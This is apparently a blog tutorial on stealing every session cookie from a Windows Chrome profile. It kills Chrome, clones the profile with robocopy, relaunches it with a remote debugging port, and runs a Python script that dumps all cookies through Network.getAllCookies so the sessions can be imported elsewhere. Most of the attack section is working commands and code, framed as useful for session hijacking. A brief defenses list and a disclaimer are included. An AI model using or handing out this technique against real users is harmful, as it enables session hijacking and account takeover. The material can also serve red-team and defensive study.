Chrome Cookie Theft via Remote Debugging Port
On this page
Chrome Debug Mode | Cookie Stealing (Windows)
Goal
Take over an authenticated Chrome profile by relaunching it with --remote-debugging-port and programmatically dump every cookie inside the browser.
This technique is feasible for an attacker with local access — or via a malicious script — on profiles that aren’t encrypted.
Background
Google Chrome exposes a WebSocket DevTools interface when launched with --remote-debugging-port=<port>. Through that port you can:
- Drive tabs
- Observe HTTP requests
- Read sensitive data like cookies (
Network.getAllCookies)
Prerequisites
- Physical or system-level access to the victim’s Chrome profile
- Chrome must be unencrypted (no profile encryption configured)
- The targeted Google account session must be active
Steps
1. Copy the Chrome Profile
taskkill /F /IM chrome.exe
robocopy "%LOCALAPPDATA%\Google\Chrome\User Data\Default" "%USERPROFILE%\Desktop\ChromeTemp\Default" /MIR /XJThe active user profile is cloned into a fresh directory (e.g.
ChromeTemp).
2. Start Chrome in Debug Mode
start "" "C:\Program Files\Google\Chrome\Application\chrome.exe" ^
--user-data-dir="%USERPROFILE%\Desktop\ChromeTemp" ^
--profile-directory="Default" ^
--remote-debugging-port=9222 ^
--no-first-run ^
--no-default-browser-checkChrome launches in the background and accepts external connections on port 9222.
3. Hit the DevTools JSON Endpoint
From a browser or the command line:
curl http://localhost:9222/jsonSample response:
[
{
"id": "C123",
"webSocketDebuggerUrl": "ws://localhost:9222/devtools/page/C123",
...
}
]We can drive the browser via that WebSocket URL.
4. Pull Cookies with Python
import asyncio, websockets, json, requests
async def get_all_cookies():
resp = requests.get("http://localhost:9222/json")
targets = resp.json()
ws_url = targets[0]["webSocketDebuggerUrl"]
async with websockets.connect(ws_url) as ws:
await ws.send(json.dumps({"id": 1, "method": "Network.enable"}))
await ws.send(json.dumps({"id": 2, "method": "Network.getAllCookies"}))
while True:
msg = await ws.recv()
data = json.loads(msg)
if data.get("id") == 2:
with open("cookies.json", "w") as f:
json.dump(data["result"]["cookies"], f, indent=2)
print("[+] Cookies saved.")
break
asyncio.run(get_all_cookies())What You Get
cookies.json will contain every session cookie collected across tabs and domains in the following format:
[
{
"domain": ".github.com",
"name": "user_session",
"value": "gho_example_token",
"httpOnly": true,
"secure": true
}
]These cookies can be imported into another browser via extensions like Cookie Editor — effectively hijacking the user’s session.
Defenses
To protect yourself against this kind of attack:
- Keep the Chrome profile under an encrypted user account (BitLocker, disk encryption)
- Limit physical access to the Chrome profile directory
- Use proper session management and 2FA on web apps
- Watch for background Chrome processes you didn’t start
Real-World Scenario
During a red team engagement, a consultant with physical access used the following chain:
- While the target’s browser was closed, the
Defaultprofile was cloned to a USB drive - The cloned profile was launched in debug mode in an offline environment
- Cookies were exfiltrated and reused to re-authenticate against critical web apps (token reuse)
Conclusion
Chrome’s debug port is a powerful tool — and a powerful weapon. With physical or system-level access, an attacker can reach every session cookie. This technique is practical for:
- Hijacking in-browser authenticated sessions
- Internal red team operations
- Developer / pentester local analysis
Disclaimer
This post is intended solely for educational and authorized penetration testing use. Applying this against systems without permission constitutes a crime.